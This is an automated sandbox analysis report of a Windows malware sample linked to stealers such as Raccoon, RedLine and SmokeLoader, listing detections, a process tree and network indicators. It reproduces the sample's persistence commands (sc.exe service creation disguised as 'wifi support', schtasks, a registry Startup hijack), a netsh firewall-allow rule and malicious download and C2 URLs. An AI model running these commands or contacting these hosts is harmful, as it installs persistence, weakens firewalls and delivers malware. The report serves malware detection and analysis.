Windows Analysis Report tijXCZsbGe.exe

Overview

General Information

Sample Name: tijXCZsbGe.exe
Analysis ID: 553073
MD5: 888928d26bd03678afd9fed0d92f6fc9
SHA1: 37723b453fd3133c01e7a43892b73c6580edd164
SHA256: 1cf27ab77a771ff942b1e2947856844fbab4991cf87aca618968445b5c5d706d
Tags: exe, RaccoonStealer
Detection

Amadey, Raccoon, RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Sigma detected: Suspicius Add Task From User AppData Temp
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • tijXCZsbGe.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\tijXCZsbGe.exe" MD5: 888928D26BD03678AFD9FED0D92F6FC9)
    • tijXCZsbGe.exe (PID: 864 cmdline: "C:\Users\user\Desktop\tijXCZsbGe.exe" MD5: 888928D26BD03678AFD9FED0D92F6FC9)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 9334.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\9334.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • DB31.exe (PID: 6560 cmdline: C:\Users\user\AppData\Local\Temp\DB31.exe MD5: 6009BCB680BE6C0F656AA157E56423DC)
        • E748.exe (PID: 5476 cmdline: C:\Users\user\AppData\Local\Temp\E748.exe MD5: 7C64BD730B6C9565F287278834A33618)
          • cmd.exe (PID: 6020 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5984 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2972 cmdline: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6584 cmdline: C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2848 cmdline: "C:\Windows\System32\sc.exe" start xzxafeeu MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • reg.exe (PID: 5772 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
          • netsh.exe (PID: 6720 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • F65C.exe (PID: 2980 cmdline: C:\Users\user\AppData\Local\Temp\F65C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • F65C.exe (PID: 5348 cmdline: C:\Users\user\AppData\Local\Temp\F65C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 5C89.exe (PID: 5200 cmdline: C:\Users\user\AppData\Local\Temp\5C89.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 6FB4.exe (PID: 5312 cmdline: C:\Users\user\AppData\Local\Temp\6FB4.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
            • cmd.exe (PID: 1004 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • schtasks.exe (PID: 5836 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8783.exe (PID: 3160 cmdline: C:\Users\user\AppData\Local\Temp\8783.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 2860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 9DFA.exe (PID: 4088 cmdline: C:\Users\user\AppData\Local\Temp\9DFA.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
        • B0F7.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\B0F7.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
  • svchost.exe (PID: 2192 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • rifsswe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\rifsswe MD5: 888928D26BD03678AFD9FED0D92F6FC9)
    • rifsswe (PID: 7088 cmdline: C:\Users\user\AppData\Roaming\rifsswe MD5: 888928D26BD03678AFD9FED0D92F6FC9)
  • svchost.exe (PID: 7020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4972 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • gecrjwsv.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe" MD5: 6DD4312F6A305B72C1A1948F27068190)
    • svchost.exe (PID: 6732 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • mjlooy.exe (PID: 2928 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(5 of 44 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
34.2.svchost.exe.5d0000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
32.2.gecrjwsv.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
35.0.F65C.exe.400000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
18.2.F65C.exe.401f910.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
17.2.E748.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
(5 of 29 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe", ParentImage: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, ParentProcessId: 2860, ProcessCommandLine: svchost.exe, ProcessId: 6732
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, ProcessId: 5984
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe", ParentImage: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, ParentProcessId: 2860, ProcessCommandLine: svchost.exe, ProcessId: 6732
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe, ParentProcessId: 6756, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, ProcessId: 5836
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6720
Sigma detected: Direct Autorun Keys Modification
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 1004, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ProcessId: 5772
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 2972

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\gecrjwsv.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\F65C.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: tijXCZsbGe.exe; Virustotal: Detection: 34%
Source: tijXCZsbGe.exe; ReversingLabs: Detection: 39%
Multi AV Scanner detection for domain / URL
Source: http://185.163.45.70/capibar; Virustotal: Detection: 11%
Source: http://185.215.113.35/d2VxjasuwS/index.php; Virustotal: Detection: 11%
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\5C89.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\5C89.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\6FB4.exe; Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\6FB4.exe; ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\9334.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\9334.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\B0F7.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\B0F7.exe; ReversingLabs: Detection: 76%
Machine Learning detection for sample
Source: tijXCZsbGe.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\5C89.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rifsswe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\gecrjwsv.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9334.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6FB4.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B0F7.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F65C.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C7FA.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8783.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9DFA.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E748.exe; Joe Sandbox ML: detected
Source: 16.3.DB31.exe.660000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.gecrjwsv.exe.580e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 38.3.5C89.exe.4d40000.2.unpack; Avira: Label: TR/Crypt.EPACK.Gen2
Source: 34.2.svchost.exe.5d0000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 32.3.gecrjwsv.exe.5a0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.E748.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 17.3.E748.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.gecrjwsv.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 16.2.DB31.exe.640e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.gecrjwsv.exe.5a0000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 17.2.E748.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Code function: 16_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Code function: 16_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Code function: 16_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Code function: 16_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Code function: 16_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\DB31.exe; Unpacked PE file: 16.2.DB31.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E748.exe; Unpacked PE file: 17.2.E748.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe; Unpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5C89.exe; Unpacked PE file: 38.2.5C89.exe.400000.0.unpack
Source: tijXCZsbGe.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\9334.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49881 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: Binary string: C:\zazadix dori\kol.pdb source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771517190.0000000004E2A000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbL source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdbM source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
Source: Binary string: C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdb source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
